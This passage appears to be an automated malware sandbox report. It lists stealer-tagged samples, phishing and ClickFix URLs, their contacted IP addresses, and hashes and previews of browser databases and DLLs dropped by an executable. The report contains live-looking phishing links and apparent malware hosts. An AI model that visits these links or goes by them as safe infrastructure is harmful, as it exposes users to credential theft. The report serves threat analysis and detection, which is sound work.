                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 13.107.246.60
                                                                                                                                                                                                                                    https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.136.10
                                                                                                                                                                                                                                    Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.109.76.243
                                                                                                                                                                                                                                    Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.123.243.182
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.109.76.144
                                                                                                                                                                                                                                    https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.246.63
                                                                                                                                                                                                                                    https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                    • 52.250.45.119
                                                                                                                                                                                                                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                    • 185.215.113.206
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.43
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.206
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                    • 185.215.113.206
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.206
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                                                    HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                                                    AKAMAI-ASUSInvoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.193.114.18
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 23.49.251.21
                                                                                                                                                                                                                                    original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.79.84.172
                                                                                                                                                                                                                                    SBAFLA TeamCALL marcia.main__ (lo).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 2.19.126.160
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 23.200.88.30
                                                                                                                                                                                                                                    aHPgKqtKWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                    • 104.121.8.149
                                                                                                                                                                                                                                    aJU0obOiEeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.195.93.152
                                                                                                                                                                                                                                    phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.193.114.43
                                                                                                                                                                                                                                    797F2AEA-982C-4B8E-84F4-E90FD6A89D27.1_originalmail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.193.114.19
                                                                                                                                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUShttps://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.155.5.177
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 13.107.246.60
                                                                                                                                                                                                                                    https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.107.136.10
                                                                                                                                                                                                                                    Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.109.76.243
                                                                                                                                                                                                                                    Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.123.243.182
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.109.76.144
                                                                                                                                                                                                                                    https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.246.63
                                                                                                                                                                                                                                    https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                    • 52.250.45.119
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    Document-v22-21-06.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    Document-v22-21-06.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    https://3r9e6kkr.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.ca%2Furl%3Fq=30NUMBER%26rct=77772474802481024856%26sa=t%26url=amp%2Fs%2Festudioit.cl%2Fstarl%2F%2523Y2FybGEuYWxkZW1pcjFAbWxjaW5zdXJhbmNlLmNvbS5hdQ==/1/0100019346ba248e-096005ca-8ea9-493d-b2f5-e0c34fd69fc0-000000/JH6rhkavYmTGSs9Zspd-vAN7bi8=401Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    https://msn-n.com/?tgvlzvqcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.202.163.200
                                                                                                                                                                                                                                    • 184.28.90.27
                                                                                                                                                                                                                                    • 40.126.31.71
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      qlI3ReINCV.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                        Entropy (8bit):1.2649482412809963
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkM0SAELyKOMq+8yC8F/YfU5m+OlTLVumF:Bq+n0J09ELyKOMq+8y9/OwS
                                                                                                                                                                                                                                                        MD5:BB728B7A584078A2CC342CE1841F987A
                                                                                                                                                                                                                                                        SHA1:3EAF922DBA0E47C78BB0E591055DD9548B22A8E1
                                                                                                                                                                                                                                                        SHA-256:9758F748021A20AF59E1DD25EEA4AD0B9C6F8112A9C18ADD6260D6924D9923AC
                                                                                                                                                                                                                                                        SHA-512:28A55E0184D3AC2336778DA7832B6A3AB63FBD5002FBD96DD1198E46DEE50D2A51B7FB591B5A1DF00EB385D78856664CE7CF82AD0A1557E4CA10A29FFBAECBD1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: qlI3ReINCV.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
